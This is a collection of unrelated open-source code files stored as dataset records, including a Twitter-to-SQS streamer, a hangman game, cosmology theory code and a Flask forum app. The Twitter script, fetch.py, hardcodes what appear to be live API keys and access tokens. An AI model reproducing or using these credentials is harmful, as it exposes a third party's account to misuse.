\"_\")\n return os.path.join(self.snapshot_storage_path, \"pluginagent_tracemalloc_jsond_%s_%s.json\" % (pid, timestamp))\n\n\ndef run_on_interval_decorator(f, interval):\n last_run = None\n @functools.wraps(f)\n def wrapper(*args, **kwargs):\n nonlocal last_run\n current_timestamp = time.monotonic()\n if not last_run or current_timestamp - last_run >= interval:\n last_run = current_timestamp\n f(*args, **kwargs)\n return wrapper\n\n","sub_path":"venv/Lib/site-packages/ruxit/mem_tracking.py","file_name":"mem_tracking.py","file_ext":"py","file_size_in_byte":3823,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"56"} +{"seq_id":"594301913","text":"import fcntl\nimport time\n\nclass Mutex(object):\n\n DexterLockI2C_handle = None\n\n def __init__(self, debug = False):\n self.mutex_debug = debug\n\n def acquire(self):\n if self.mutex_debug:\n print(\"I2C mutex acquire\")\n\n acquired = False\n while not acquired:\n try:\n self.DexterLockI2C_handle = open('/run/lock/DexterLockI2C', 'w')\n # lock\n fcntl.lockf(self.DexterLockI2C_handle, fcntl.LOCK_EX | fcntl.LOCK_NB)\n acquired = True\n except IOError: # already locked by a different process\n time.sleep(0.001)\n except Exception as e:\n print(e)\n\n if self.mutex_debug:\n print(\"I2C mutex acquired {}\".format(time.time()))\n\n def release(self):\n if self.mutex_debug:\n print(\"I2C mutex release: {}\".format(time.time()))\n if self.DexterLockI2C_handle is not None and self.DexterLockI2C_handle is not True:\n self.DexterLockI2C_handle.close()\n self.DexterLockI2C_handle = None\n time.sleep(0.001)\n\n def enableDebug(self):\n self.mutex_debug = True\n\n def disableDebug(self):\n self.mutex_debug = False\n\n def __enter__(self):\n if self.mutex_debug:\n print(\"I2C mutex enter\")\n return self\n\n def __exit__(self, exception_type, exception_value, traceback):\n if self.mutex_debug:\n print(\"I2C mutex exit\")\n self.release()\n","sub_path":"API/I2C_mutex.py","file_name":"I2C_mutex.py","file_ext":"py","file_size_in_byte":1513,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"56"} +{"seq_id":"297141782","text":"import logging\nimport logging.handlers\nimport sys\nimport os.path\n\n\nclass Logger(object):\n \"\"\"\n Logger objects with initialized File and Syslog logger.\n \"\"\"\n _logger = None\n _logname = None\n _logger_amslib = None\n\n def _init_stdout(self):\n lfs = '%(levelname)s - %(message)s'\n lf = logging.Formatter(lfs)\n lv = logging.INFO\n\n 
logging.basicConfig(format=lfs, level=lv, stream=sys.stderr)\n self._logger = logging.getLogger(self._logname)\n\n def _init_amslib(self):\n self._logger_amslib = logging.getLogger('argo_ams_library')\n\n def _init_filelog(self, logfile):\n lfs = '%(asctime)s %(name)s[%(process)s]: %(levelname)s - %(message)s'\n lf = logging.Formatter(fmt=lfs, datefmt='%Y-%m-%d %H:%M:%S')\n lv = logging.INFO\n\n sf = logging.handlers.RotatingFileHandler(logfile, maxBytes=512 * 1024, backupCount=4)\n self._logger.fileloghandle = sf.stream\n sf.setFormatter(lf)\n sf.setLevel(lv)\n self._logger.addHandler(sf)\n if self._logger_amslib:\n self._logger_amslib.fileloghandle = sf.stream\n self._logger_amslib.addHandler(sf)\n\n def __init__(self, logname, logdir):\n self._logname = logname\n try:\n if not os.path.isdir(logdir):\n os.makedirs(logdir)\n self._init_amslib()\n self._init_stdout()\n self._init_filelog(logdir + self._logname + '.log')\n except (OSError, IOError) as e:\n sys.stderr.write('ERROR - ' + str(e) + '\\n')\n raise SystemExit(1)\n\n def get(self):\n return self._logger\n","sub_path":"pymod/Logger.py","file_name":"Logger.py","file_ext":"py","file_size_in_byte":1642,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"56"} +{"seq_id":"311033344","text":"\nfrom tweepy.streaming import StreamListener\nfrom tweepy import OAuthHandler\nfrom tweepy import Stream\nimport boto3\nimport json\nfrom pyes import *\n#Enter your twitterAPI keys here\nconsumer_key = 'HeDMdrMZl1IRMundFMcY3c7hw'\nconsumer_secret = 'Smz8HNLqFiI8GMs6MGIJ21JJKe2Fs3D6R0R8S3KgievvgDSZG8'\naccess_token = '182386406-8Mhs3kxCnqDlAnE1n1YfavwyS8lgUFE836M6Zz0x'\naccess_secret = 'Z3eVU6UyrOPDifEWhYYy8zZH9levDmUbr5XLDrOHZ4pcf'\n\n# Get the service resource\nsqs = boto3.resource('sqs')\n# Create/Get the SQS Queue instance\nqueue = sqs.get_queue_by_name(QueueName='twitttrends-17')\nprint(queue.url)\n\nclass StdOutListener(StreamListener):\n def on_data(self, data):\n data_json = json.loads(data)\n try:\n if data_json[\"coordinates\"]:\n if data_json[\"lang\"] == \"en\":\n print(data_json['lang'])\n coordinates = data_json['coordinates']['coordinates']\n tweet = data_json['text']\n place = data_json['place']\n user_name = data_json['user']['name']\n e_data = {\n 'User_name': {'DataType': 'String', 'StringValue': user_name},\n 'City': {'DataType': 'String', 'StringValue': place['full_name']},\n 'Country': {'DataType': 'String', 'StringValue': place['country']},\n 'Latitude': {'DataType': 'String', 'StringValue': str(coordinates[0])},\n 'Longitude': {'DataType': 'String', 'StringValue': str(coordinates[1])}\n }\n #\n print(e_data)\n\n response = queue.send_message(MessageBody=tweet, MessageAttributes=e_data)\n print(\"Message ID \" + str(response.get('MessageId')))\n except Exception as e:\n print('Exception ' + str(e))\n return True\n\n def on_error(self, status):\n print('error ' + str(status))\n\n\nif __name__ == '__main__':\n auth = OAuthHandler(consumer_key, consumer_secret)\n auth.set_access_token(access_token, access_secret)\n stream = Stream(auth, StdOutListener())\n stream.filter(locations=[-180, -90, 180, 90])\n\n","sub_path":"TwittTrends/TweetTrends/fetch.py","file_name":"fetch.py","file_ext":"py","file_size_in_byte":2206,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"56"} +{"seq_id":"430538643","text":"from mcstatus import MinecraftServer\n\nfile = open('servers.txt', 'r')\ncount = 0\n\nips = []\nwhile True:\n count += 1\n line = file.readline()\n if not line:\n 
break\n ips.append(line.strip())\n\nfor ip in ips:\n try:\n server = MinecraftServer.lookup(ip)\n status = server.status()\n print(ip)\n print(\"Players online:\", status.players.online)\n print(\"Version:\", status.version.name)\n print('')\n except:\n pass","sub_path":"info.py","file_name":"info.py","file_ext":"py","file_size_in_byte":469,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"56"} +{"seq_id":"131351409","text":"import random\r\nfrom time import sleep as s\r\nprint(\"Let's play Hangman!\")\r\ns(1)\r\nprint(\"You have 1 more incorrect guesses than there are letters in the word\")\r\ns(2)\r\nprint(\"You may guess the whole word, but you will lose if you guess wrong\")\r\ns(2)\r\nprint(\"Here we go\")\r\ns(2)\r\nrepeat=\"\"\r\nfruits=[(\"apple\",5),(\"apricot\",8),(\"avocado\",6),(\"banana\",4),(\"blackcurrant\",10),(\"blueberry\",7),(\"carambola\",8),(\"cherry\",6),(\"coconut\",6),(\"cranberry\",8),\r\n (\"feijoa\",7),(\"fig\",4),(\"gooseberry\",8),(\"grapefruit\",10),(\"grape\",6),(\"melon\",6),(\"kiwi\",4),(\"lemon\",6),(\"lime\",5),(\"mandarin\",7),(\"mango\",6),\r\n (\"nectarine\",8),(\"orange\",7),(\"papaya\",4),(\"peach\",6),(\"pear\",5),(\"pineapple\",7),(\"plum\",5),(\"pomegranate\",10),(\"pummelo\",7),(\"raspberry\",8),\r\n (\"strawberry\",9),(\"tangerine\",8),(\"watermelon\",10)] #always will be expanded, all themes\r\nsports=[(\"soccer\",6),(\"football\",7),(\"baseball\",6),(\"basketball\",7),(\"tennis\",6),(\"hockey\",7)]\r\ncountries=[(\"Afghanistan\",10),(\"Albania\",7),(\"Algeria\",8),(\"Andorra\",7),(\"Angola\",7),(\"Anguilla\",8),(\"Antarctica\",8),(\"Argentina\",9),(\"Armenia\",8),\r\n (\"Aruba\",6),(\"Australia\",9),(\"Austria\",8),(\"Azerbaijan\",10),(\"Bahamas\",6),(\"Bahrain\",7),(\"Bangladesh\",10),(\"Barbados\",8),(\"Belarus\",8),\r\n (\"Belgium\",8),(\"Belize\",6),(\"Benin\",5),(\"Bermuda\",8),(\"Bhutan\",7),(\"Bolivia\",7),(\"Botswana\",8),(\"Brazil\",7),(\"Brunei\",7),(\"Bulgaria\",8),\r\n (\"Burundi\",7),(\"Cambodia\",8),(\"Cameroon\",8),(\"Canada\",5),(\"Chad\",5),(\"Chile\",6),(\"China\",6),(\"Columbia\",9),(\"Comoros\",6),(\"Congo\",5),\r\n (\"Croatia\",7),(\"Cuba\",5),(\"Cyprus\",7),(\"Denmark\",8),(\"Djibouti\",8),(\"Dominica\",8),(\"Ecuador\",8),(\"Egypt\",6),(\"Eritrea\",7),(\"Estonia\",8),\r\n (\"Ethiopia\",8),(\"Fiji\",4),(\"Finland\",7),(\"France\",7),(\"Gabon\",6),(\"Gambia\",6),(\"Georgia\",8),(\"Germany\",8),(\"Ghana\",5),(\"Gibraltar\",8),\r\n (\"Greece\",5),(\"Greenland\",8),(\"Grenada\",7),(\"Guadeloupe\",9),(\"Guatemala\",8),(\"Guinea\",7),(\"Guyana\",6),(\"Haiti\",5),(\"Vatican\",7),(\"Honduras\",9),\r\n (\"Hungary\",8),(\"Iceland\",8),(\"India\",6),(\"Indonesia\",9),(\"Iran\",5),(\"Iraq\",5),(\"Ireland\",8),(\"Israel\",7),(\"Italy\",6),(\"Jamaica\",6),(\"Japan\",5),\r\n (\"Jordan\",7),(\"Kazakstan\",8),(\"Kenya\",6),(\"Kiribati\",7),(\"North Korea\",10),(\"South Korea\",11),(\"Kosovo\",5),(\"Kuwait\",7),(\"Kyrgyzstan\",10),\r\n (\"Latvia\",6),(\"Lebanon\",7),(\"Lesotho\",7),(\"Liberia\",7),(\"Liechtenstein\",9),(\"Lithuania\",8),(\"Luxembourg\",10),(\"Macau\",5),(\"Macedonia\",9),\r\n (\"Madagascar\",8),(\"Malaysia\",7),(\"Maldives\",9),(\"Mali\",5),(\"Malta\",5),(\"Martinique\",10),(\"Mauritania\",8),(\"Mexico\",7),(\"Micronesia\",10),\r\n (\"Moldova\",7),(\"Monaco\",6),(\"Mongolia\",8),(\"Montenegro\",8),(\"Morocco\",5),(\"Mozambique\",11),(\"Myanmar\",7),(\"Namibia\",6),(\"Nauru\",5),(\"Nepal\",6),\r\n 
(\"Netherlands\",11),(\"Nicaragua\",8),(\"Niger\",6),(\"Norway\",7),(\"Oman\",5),(\"Pakistan\",8),(\"Panama\",5),(\"Paraguay\",7),(\"Peru\",5),(\"Philippines\",9),\r\n (\"Poland\",7),(\"Portugal\",9),(\"Qatar\",5),(\"Reunion\",7),(\"Romania\",7),(\"Russia\",6),(\"Rwanda\",6),(\"Samoa\",5),(\"Senegal\",7),(\"Serbia\",7),\r\n (\"Seychelles\",8),(\"Singapore\",10),(\"Slovakia\",8),(\"Slovenia\",9),(\"Somalia\",7),(\"SAR\",4),(\"Spain\",6),(\"Sudan\",6),(\"Suriname\",9),(\"Swaziland\",9),\r\n (\"Sweden\",6),(\"Switzerland\",12),(\"Syria\",6),(\"Taiwan\",6),(\"Tajikistan\",9),(\"Tanzania\",6),(\"Thailand\",8),(\"Togo\",4),(\"Tokelau\",8),(\"Tonga\",6),\r\n (\"Tunisia\",7),(\"Turkey\",7),(\"Turkmenistan\",12),(\"Tuvalu\",6),(\"Uganda\",6),(\"Ukraine\",8),(\"UAE\",4),(\"UK\",3),(\"USA\",4),(\"Uruguay\",7),\r\n (\"Uzbekistan\",11),(\"Vanuatu\",6),(\"Venezuela\",8),(\"Yemen\",5),(\"Zambia\",6),(\"Zimbabwe\",8),]\r\nthemes=[fruits,sports,countries]\r\n#final message setup\r\ntick=0\r\ncross=0\r\n#game\r\nwhile repeat==\"\":\r\n s(1)\r\n try:\r\n r=int(input(\"We have 3 themes to choose from: Type 0 to for fruits: Type 1 for sports: Type 2 for Countries:\"))\r\n choice=themes[r]\r\n except IndexError:\r\n print(\"Whoops, Choose a number from 0 to 2.\")\r\n repeat=''\r\n continue\r\n i=random.choice(choice)\r\n (word,turns)=i\r\n word=word.lower()\r\n s(1.5)\r\n print(\"The word is ready! You have\",turns,\"guesses... Good Luck\")\r\n wrong=0\r\n guess=[\"-\"]*len(word)\r\n letters=\"abcdefghijklmnopqrstuvwxyz\"\r\n while wrong<=turns:\r\n curr=''\r\n print(wrong,\"Guesses wrong so far\",end='')\r\n let=input(\":\")\r\n let=let.lower()\r\n s(1)\r\n if len(let)>1:\r\n print(\"You decided to guess the whole word\")\r\n s(1)\r\n if let==word:\r\n print(\"Congratulations!\")\r\n break\r\n else:\r\n print(\"You guessed wrong...\")\r\n break\r\n if let.isalpha()==False:\r\n print(\"Obviously, something is here.\")\r\n elif len(let)==0:\r\n print(\"Please guess a letter\")\r\n else:\r\n if (let in word) and (let in letters):\r\n print(\"Correct\")\r\n letters=letters.replace(let,\"\")\r\n for count in range(len(word)):\r\n if word[count]==let:\r\n guess[count]=let\r\n s(1)\r\n print(\"The word is now\", sep='')\r\n else:\r\n print(\"Wrong\")\r\n wrong+=1\r\n print(\"Here's what you have so far:\",end='')\r\n for l in guess:\r\n curr+=l\r\n print(curr)\r\n if curr==word:\r\n print(\"You've guessed it!\")\r\n tick+=1\r\n cross-=1\r\n break\r\n else:\r\n s(1)\r\n cross+=1\r\n print(\"The word is:\",word)\r\n print(\"Game Over\")\r\n repeat=input(\"Hit ENTER to play again. Type anything to end game:\")\r\nprint(\"Thank you for playing!\")\r\ns(1)\r\nprint(\"You guessed...\", tick, \" wrong\")\r\nprint(\"You guessed...\", cross, \" right\")","sub_path":"Hangman_Game.py","file_name":"Hangman_Game.py","file_ext":"py","file_size_in_byte":5843,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"56"} +{"seq_id":"488455787","text":"from django.urls import path, include\n\nfrom . 
import views\n\nurlpatterns = [\n path('list/', views.ReportListView.as_view()),\n path('detail/', views.ReportView.as_view()),\n path('get/list/', views.ReportViewGetByTree.as_view()),\n path('create/', views.add_report, name=\"add_report\"),\n]","sub_path":"reports/urls.py","file_name":"urls.py","file_ext":"py","file_size_in_byte":316,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"56"} +{"seq_id":"391873335","text":"n = int(input(\"Input a natural number: \")) # Do not change this line\n\n# Fill in the missing code below\nprime = True\ncounter = 2\n\nwhile counter < n:\n if n % counter == 0:\n prime = False\n counter += 1\n\n# Do not changes the lines below\nif prime:\n print(\"Prime\")\nelse:\n print(\"!Prime\")\n","sub_path":"verk3/daemi3.5.py","file_name":"daemi3.5.py","file_ext":"py","file_size_in_byte":301,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"56"} +{"seq_id":"636074727","text":"import numpy as np\nimport warnings\nimport yaml\n\n# same convention as elsewhere\nSHEAR_SHEAR = 0\nSHEAR_POS = 1\nPOS_POS = 2\n\ndef ccl_read_yaml(filename, **kwargs):\n import pyccl as ccl\n \"\"\"Read the parameters from a YAML file.\n\n Args:\n filename (:obj:`str`) Filename to read parameters from.\n \"\"\"\n with open(filename, 'r') as fp:\n params = yaml.load(fp, Loader=yaml.Loader)\n\n # Now we assemble an init for the object since the CCL YAML has\n # extra info we don't need and different formatting.\n inits = dict(\n Omega_c=params['Omega_c'],\n Omega_b=params['Omega_b'],\n h=params['h'],\n n_s=params['n_s'],\n sigma8=None if params['sigma8'] == 'nan' else params['sigma8'],\n A_s=None if params['A_s'] == 'nan' else params['A_s'],\n Omega_k=params['Omega_k'],\n Neff=params['Neff'],\n w0=params['w0'],\n wa=params['wa'],\n bcm_log10Mc=params['bcm_log10Mc'],\n bcm_etab=params['bcm_etab'],\n bcm_ks=params['bcm_ks'],\n mu_0=params['mu_0'],\n sigma_0=params['sigma_0'])\n if 'z_mg' in params:\n inits['z_mg'] = params['z_mg']\n inits['df_mg'] = params['df_mg']\n\n if 'm_nu' in params:\n inits['m_nu'] = params['m_nu']\n inits['m_nu_type'] = 'list'\n\n inits.update(kwargs)\n\n return ccl.Cosmology(**inits)\n\n\ndef theory_3x2pt(cosmology_file, tracers, nbin_source, nbin_lens, fourier=True):\n \"\"\"Compute the 3x2pt theory, for example for a fiducial cosmology\n\n Parameters\n ----------\n cosmology_file: str\n name of YAML file\n\n tracers: dict{str:obj}\n dict of objects (e.g. 
sacc tracers) containing z, nz.\n keys are source_0, source_1, ..., lens_0, lens_1, ...\n \n nbin_source: int\n number of source bins\n\n nbin_lens: int\n number of lens bins\n\n Returns\n -------\n theory_cl: dict{str:array}\n theory c_ell for each pair (i,j,k) where k is one of\n SHEAR_SHEAR = 0, SHEAR_POS = 1, POS_POS = 2\n\n \"\"\"\n import pyccl as ccl\n\n cosmo = ccl_read_yaml(cosmology_file, matter_power_spectrum='halofit', Neff=3.04)\n\n ell_max = 3000 if fourier else 100_000\n n_ell = 100 if fourier else 200\n ell = np.logspace(1, np.log10(ell_max), n_ell).astype(int)\n ell = np.unique(ell)\n\n\n # Convert from SACC tracers (which just store N(z))\n # to CCL tracers (which also have cosmology info in them).\n CTracers = {}\n\n # Lensing tracers - need to think a little more about\n # the fiducial intrinsic alignment here\n for i in range(nbin_source):\n x = tracers[f'source_{i}']\n tag = ('S', i)\n CTracers[tag] = ccl.WeakLensingTracer(cosmo, dndz=(x.z, x.nz))\n # Position tracers - even more important to think about fiducial biases\n # here - these will be very very wrong otherwise!\n # Important enough that I'll put in a warning.\n warnings.warn(\"Not using galaxy bias in fiducial theory density spectra\")\n\n for i in range(nbin_lens):\n x = tracers[f'lens_{i}']\n tag = ('P', i) \n b = np.ones_like(x.z)\n CTracers[tag] = ccl.NumberCountsTracer(cosmo, dndz=(x.z, x.nz),\n has_rsd=False, bias=(x.z,b))\n\n # Use CCL to actually calculate the C_ell values for the different cases\n theory_cl = {}\n theory_cl['ell'] = ell\n k = SHEAR_SHEAR\n for i in range(nbin_source):\n for j in range(i+1):\n Ti = CTracers[('S',i)]\n Tj = CTracers[('S',j)]\n # The full theory C_ell over the range 0..ellmax\n theory_cl [(i,j,k)] = ccl.angular_cl(cosmo, Ti, Tj, ell)\n theory_cl [(j,i,k)] = theory_cl [(i,j,k)]\n \n\n # The same for the galaxy galaxy-lensing cross-correlation\n k = SHEAR_POS\n for i in range(nbin_source):\n for j in range(nbin_lens):\n Ti = CTracers[('S',i)]\n Tj = CTracers[('P',j)]\n theory_cl [(i,j,k)] = ccl.angular_cl(cosmo, Ti, Tj, ell)\n\n # And finally for the density correlations\n k = POS_POS\n for i in range(nbin_lens):\n for j in range(i+1):\n Ti = CTracers[('P',i)]\n Tj = CTracers[('P',j)]\n theory_cl [(i,j,k)] = ccl.angular_cl(cosmo, Ti, Tj, ell)\n theory_cl [(j,i,k)] = theory_cl [(i,j,k)]\n\n if fourier:\n return theory_cl\n\n theta_min = 1.0 / 60\n theta_max = 3.0\n theta = np.logspace(np.log10(theta_min), np.log10(theta_max), 200)\n\n theory_xi = {'theta': theta*60} # arcmin\n for key, val in theory_cl.items():\n if key == 'ell':\n continue\n i,j,k = key\n corr_type = {SHEAR_SHEAR: 'L+', POS_POS: 'GG', SHEAR_POS: 'GL'}[k]\n xi = ccl.correlation(cosmo, ell, val, theta, corr_type=corr_type)\n if k == SHEAR_SHEAR:\n xim = ccl.correlation(cosmo, ell, val, theta, corr_type='L-')\n theory_xi[(i,j,k)] = [xi,xim]\n else:\n theory_xi[(i,j,k)] = xi\n\n return theory_cl, theory_xi\n","sub_path":"txpipe/utils/theory.py","file_name":"theory.py","file_ext":"py","file_size_in_byte":4989,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"56"} +{"seq_id":"290023931","text":"# This contains our frontend; since it is a bit messy to use the @app.route\n# decorator style when using application factories, all of our routes are\n# inside blueprints. 
This is the front-facing blueprint.\n#\n# You can find out more about blueprints at\n# http://flask.pocoo.org/docs/blueprints/\n\nfrom flask import Blueprint, render_template\nfrom flask_nav.elements import Navbar, View, Subgroup, Link, Text, Separator\n\nfrom .nav import nav\n\nfrontend = Blueprint('frontend', __name__)\n\n# We're adding a navbar as well through flask-navbar. In our example, the\n# navbar has an unusual amount of Link-Elements, more commonly you will have a\n# lot more View instances.\nnav.register_element('frontend_top', Navbar(\n    View('Flask-Bootstrap', '.index'),\n    View('Home', '.index'),\n    View('Debug-Info', 'debug.debug_root'),\n    Subgroup(\n        'Docs',\n        Link('Flask-Bootstrap', 'http://pythonhosted.org/Flask-Bootstrap'),\n        Link('Flask-AppConfig', 'https://github.com/mbr/flask-appconfig'),\n        Link('Flask-Debug', 'https://github.com/mbr/flask-debug'),\n        Separator(),\n        Text('Bootstrap'),\n        Link('Getting started', 'http://getbootstrap.com/getting-started/'),\n        Link('CSS', 'http://getbootstrap.com/css/'),\n        Link('Components', 'http://getbootstrap.com/components/'),\n        Link('Javascript', 'http://getbootstrap.com/javascript/'),\n        Link('Customize', 'http://getbootstrap.com/customize/'),\n    )\n))\n\n\n# Our index-page just shows a quick explanation. Check out the template\n# \"templates/index.html\" documentation for more details.\n@frontend.route('/')\ndef index():\n    return render_template('index.html')\n","sub_path":"sample_app/frontend.py","file_name":"frontend.py","file_ext":"py","file_size_in_byte":1659,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"56"} +{"seq_id":"25800057","text":"# Variables\nnaam = \"Jordan\" # this is called a string\naanuit = True # this is a boolean\npuntgetal = 5.5 # this is a float or double\nkarakter = '#'\nheelgetal = 123 # this is an integer\n\n\n#puntgetal = puntgetal * 2\n\n# this is a comment\n\nprint(naam)\nprint(aanuit)\nprint(puntgetal) #print(True)\n#print(restwaarde) # 'restwaarde' was never defined, so this line is commented out\n\n\nuitkomst = heelgetal / puntgetal\nprint(uitkomst)\n\nnaam = \"Tantoe\"\n\nstukjeTekst = \"Hallo\"\nstukjeTekst += \" Mijn naam is \" + naam\nprint(stukjeTekst)","sub_path":"variabelen.py","file_name":"variabelen.py","file_ext":"py","file_size_in_byte":455,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"56"} +{"seq_id":"92718771","text":"import FWCore.ParameterSet.Config as cms\n\nprocess = cms.Process(\"testMetaTree\")\n\nprocess.load(\"FWCore.MessageService.MessageLogger_cfi\")\n\nprocess.maxEvents = cms.untracked.PSet( input = cms.untracked.int32(10) )\nprocess.source = cms.Source(\"PoolSource\",\n    # replace 'myfile.root' with the source file you want to use \n    fileNames = cms.untracked.vstring(\n        'file:/afs/cern.ch/user/m/mverzett/work/framework/CMSSW_7_0_7_patch1/src/URAnalysis/PATTools/test/pat_test.root'\n    )\n)\n\nprocess.load('Configuration.StandardSequences.Services_cff')\nprocess.load('DQMServices.Components.EDMtoMEConverter_cfi')\nprocess.load('URAnalysis.Ntuplizer.MetaNtuplize_cfi')\n\nprocess.TFileService = cms.Service(\n    \"TFileService\", \n    fileName = cms.string(\"test_meta_tree2.root\") \n)\n\nprocess.meta = cms.Sequence(\n    process.EDMtoMEConverter +\n    process.metaTree\n)\n\nprocess.p = cms.Path(process.meta)\nprocess.schedule = cms.Schedule(process.p)\n","sub_path":"Ntuplizer/test/test_meta_tree.py","file_name":"test_meta_tree.py","file_ext":"py","file_size_in_byte":1108,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"56"}
+{"seq_id":"42184637","text":"# -*- encoding: utf-8 -*-\nfrom django import template\nfrom bs4 import BeautifulSoup\n\nregister = template.Library()\n\n\n@register.simple_tag(takes_context=True)\ndef get_entry_image(context, entry):\n imgurl = None\n leadsoup = BeautifulSoup(entry.lead)\n contentsoup = BeautifulSoup(entry.content)\n img = leadsoup.img or contentsoup.img\n if img:\n imgsrc = img[\"src\"]\n if imgsrc.endswith(\"jpg\") or imgsrc.endswith(\"png\"):\n request = context['request']\n imgurl = 'https://%s%s' %(request.get_host(), imgsrc)\n return imgurl\n","sub_path":"v2/patrodent/blog/templatetags/blog_tags.py","file_name":"blog_tags.py","file_ext":"py","file_size_in_byte":569,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"56"} +{"seq_id":"544534815","text":"from flask import *\nfrom pymongo import MongoClient\n\n\n# my files\nimport config\nimport html\nimport utils\nfrom utils import getUser, getThread, getForum, admin\nimport auth\n\n\napp = Flask(__name__)\napp.debug = True\napp.secret_key = \"key\"\nc = MongoClient()\n\nfn = \"Index\"\ndef getFn():\n return fn\ndef getUID():\n try:\n return session[\"uid\"]\n except:\n return -1\n\ndef page(body,u):\n return render_template(\"index.html\",header=html.getHeader(u),body=body)\n\n# LOGIN/REGISTER\n@app.route(\"/login\",methods=['GET','POST'])\ndef login():\n # type:\n # 1 = username/password combo does not exist\n if request.method == \"POST\":\n user = auth.login(request.form[\"username\"],request.form[\"password\"])\n \n if user:\n session[\"uid\"] = user[\"id\"]\n return redirect(\"/?type=3\")\n else:\n return page(html.login(1),-1)\n else:\n return page(html.login(0),-1)\n\n\n@app.route(\"/register\",methods=['GET','POST'])\ndef register():\n # type:\n # 1 = username already in use\n # 2 = passwords don't match\n if request.method == \"POST\":\n if request.form[\"password\"] == request.form[\"password2\"]:\n result = auth.register(request.form[\"username\"],request.form[\"password\"])\n if result:\n session[\"uid\"] = result\n return redirect(\"/?type=2\")\n else:\n return page(html.register(1),-1)\n else:\n return page(html.register(2),-1)\n else:\n return page(html.register(0),-1)\n\n@app.route(\"/logout\")\ndef logout():\n session.pop(\"uid\",None)\n return redirect(\"/?type=1\")\n\n@app.route(\"/\")\ndef index():\n # type:\n # 1 = logged out\n # 2 = registered\n # 3 = logged in\n uid = getUID()\n nav = utils.nav([[fn]])\n r = \"\"\n\n r += '
Forum'\n    r += nav\n\n    tp = request.args.get(\"type\")\n    mes = \"\"\n    if tp == '1':\n        mes = \"You have logged out.\"\n    elif tp == '2':\n        mes = \"Account registration successful!\"\n    elif tp == '3':\n        mes = \"You have logged in.\"\n\n    if mes:\n        r += 'Success: %s'%(mes)\n\n    r += \"\"\"\n\n\n\n\n\n\n\"\"\"\n    for x in c.forums.Collections.find():\n        r += html.forum(x)\n    r += 'Forum NameThreadsPostsLast Post'\n    \n    r += \"\"\"\n\n\n\n\n\n\n\nForum Statistics\nTotal Posts: %d\nTotal Threads: %d\nTotal Users: %d\n\"\"\"%(c.posts.Collections.find().count(),c.threads.Collections.find().count(),c.users.Collections.find().count())\n\n\n\n\n    r += nav\n\n\n    return page(r,uid)\n\n\n@app.route(\"/forum-<int:n>\")\ndef forum(n):\n    # type:\n    # 1 = thread deleted\n    uid = getUID()\n    r = \"\"\n    \n    forum = getForum(n)\n    if forum:\n\n        nav = utils.nav([\n            [\"/\",fn],\n            [forum[\"name\"]]\n        ])\n\n        options = \"\"\n        if uid != -1:\n            options = ''%(forum['id'])\n\n        r += '%s'%(forum['name'])\n        r += nav\n\n        tp = request.args.get(\"type\")\n        mes = \"\"\n        if tp == '1':\n            mes = \"Thread deleted.\"\n\n        if mes:\n            r += 'Success: %s'%(mes)\n\n\n        r += options\n        r += \"\"\"\n\n\"\"\"\n        thr = c.threads.Collections.find({\"fid\":forum['id']})\n        if thr.count() == 0:\n            r += ''\n        else:\n            for x in thr:\n                r += html.thread(x,admin(uid))\n        r += 'Thread TitleAuthorPostsLast PostNo threads exist in this forum'\n        r += options\n        r += nav\n\n    return page(r,uid)\n\n\n@app.route(\"/thread-<int:n>\")\ndef thread(n):\n    uid = getUID()\n\n\n    r = \"\"\n\n    thread = getThread(n)\n    \n    if thread:\n        # if thread is hidden and cannot view\n        if thread['hid'] and not admin(uid):\n            return page(html.permissionDenied(),uid)\n\n        posts = c.posts.Collections.find({\"tid\":thread['id']}).sort(\"id\",1)\n        # pages\n        pg = 1\n        p = request.args.get(\"page\")\n        if p:\n            pg = int(p)\n\n        pghtml = html.pages(pg,int((posts.count()-1)/config.postsPerPage())+1,\"thread-%d?page=\"%(thread['id']))\n\n        forum = getForum(thread[\"fid\"])\n        nav = utils.nav([\n            [\"/\",fn],\n            [\"/forum-%d\"%(forum['id']),forum[\"name\"]],\n            [thread[\"title\"]]\n        ])\n\n\n        atools = \"\"\n\n\n\n        # admin tools\n        if admin(uid):\n            atools += \"\"\"\n\n\n\n\n\nAdministrativeTools\n                Edit Thread Title\"\"\"%(thread['id'])\n\n            # lock/unlock\n            if \"lock\" in thread.keys() and thread['lock']:\n                atools += ' Unlock Thread'%(thread['id'])\n            else:\n                atools += ' Lock Thread'%(thread['id'])\n\n            # hide/unhide\n            if \"hid\" in thread.keys() and thread['hid']:\n                atools += ' Unhide Thread'%(thread['id'])\n            else:\n                atools += ' Hide Thread'%(thread['id'])\n            atools += \"\"\"\n                Delete Thread\n            \"\"\"%(thread['id'])\n\n        options = \"\"\n        if uid != -1 and (not thread['lock'] or admin(uid)):\n            options = ''%(thread['id'])\n\n\n        r += '%(title)s%(desc)s'%(thread)\n\n        r += ''\n\n        if thread['lock']:\n            r += ' Locked'\n        if thread['hid']:\n            r += ' Hidden'\n        \n        r += ''\n\n        mes = request.args.get(\"type\")\n        if mes == '1':\n            mes = \"Thread title edited\"\n        elif mes == '2':\n            mes = \"Thread hidden\"\n        elif mes == '3':\n            mes = \"Thread unhidden\"\n        elif mes == '4':\n            mes = \"Thread locked\"\n        elif mes == '5':\n            mes = \"Thread unlocked\"\n        elif mes == '51':\n            mes = \"Post deleted\"\n        elif mes == '52':\n            mes = \"Post edited\"\n\n\n\n        r += nav\n        if mes:\n            r += 'Success: %s'%(mes)\n        r += atools\n        r += pghtml\n        r += options\n        r += ''\n\n\n        ppp = config.postsPerPage()\n        for x in range((pg-1)*ppp,min(pg*ppp,posts.count())):\n            r += html.post(uid,posts[x])\n\n        r += ''\n        r += options\n        r += pghtml\n        r += nav\n\n        return page(r,uid)\n    else:\n        return 